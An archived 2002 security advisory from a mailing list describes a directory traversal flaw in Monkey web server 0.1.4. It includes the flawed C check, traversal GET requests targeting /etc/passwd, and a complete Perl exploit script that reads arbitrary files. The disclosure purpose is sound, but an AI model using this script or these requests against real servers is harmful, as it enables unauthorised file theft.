[UNIX] Directory Traversal Vulnerability in Monkey
From: support@securiteam.comDate: 09/30/02
- Previous message: support@securiteam.com: "[UNIX] Exploitable Buffer Overflow in gv"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 30 Sep 2002 16:29:58 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Directory Traversal Vulnerability in Monkey
------------------------------------------------------------------------
SUMMARY
<http://monkeyd.sourceforge.net> Monkey is a Web server written in C that
works under Linux. This is an open source project based on the HTTP/1.1
protocol. A security vulnerability in the product allows remote attackers
to cause a directory traversal vulnerability, allowing them to access
files that would be otherwise inaccessible (files residing outside the
normally bounding HTML root directory).
DETAILS
Vulnerable systems:
* Monkey version 0.1.4
Immune systems:
* Monkey version 0.5.0
Monkey does not check HTTP request for the "../" string, and because of
that, attacker can view any file out of SERVER_ROOT directory which Monkey
can read (if Monkey is running under root account, attacker can read any
file on that machine).
Vulnerable code:
- src/method.c
..
if((strcmp(aux_request,"/"))==0 || aux_request[1]=='.' ) {
snprintf(filename,255,"%s",SERVER_ROOT);
}
As written in the above code, the following will be blocked:
---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
However, this will not:
---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
Vendor response:
This bug was reported in December 2001 and corrected in following
versions. Anyway recently was released Monkey 0.5.0.
Exploit:
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit
#
# Usage:
# perl monkey.pl <hostname> <httpport> <file>
#
# <hostname> - target host
# <httpport> - port on which HTTP daemon is listening
# <file> - file which you wanna get
#
# Example:
# perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
# by DownBload <downbload@hotmail.com>
# Illegal Instruction Labs
#
use IO::Socket;
sub sock () {
$SOCK = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => "tcp")
|| die "[ ERROR: Can't connect to $host!!! ]\n\n";
}
sub banner() {
print "[--------------------------------------------------]\n";
print "[ Monkey-0.1.4 reverse traversal exploit ]\n";
print "[ by DownBload <downbload\@hotmail.com> ]\n";
print "[ Illegal Instruction Labs ]\n";
print "[--------------------------------------------------]\n";
}
if ($#ARGV != 2)
{
banner();
print "[ Usage: ]\n";
print "[ perl monkey.pl <hostname> <httpport> <file> ]\n";
print "[--------------------------------------------------]\n";
exit(0);
}
$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];
banner();
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending probe... ]\n";
print $SOCK "HEAD / HTTP/1.0\n\n";
while ($a = <$SOCK>) { $line = $line . $a; }
if ($line =~ /Monkey/) { print "[ Monkey HTTP server found,
continuing... ]\n"; }
else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
close ($SOCK);
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending GET request... ]\n";
print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while ($line = <$SOCK>) { print $line; }
close ($SOCK);
ADDITIONAL INFORMATION
The information has been provided by <mailto:edsiper@linux-chile.org>
edsiper and <mailto:keziah@uole.com> Daniel R. Ome.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Exploitable Buffer Overflow in gv"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
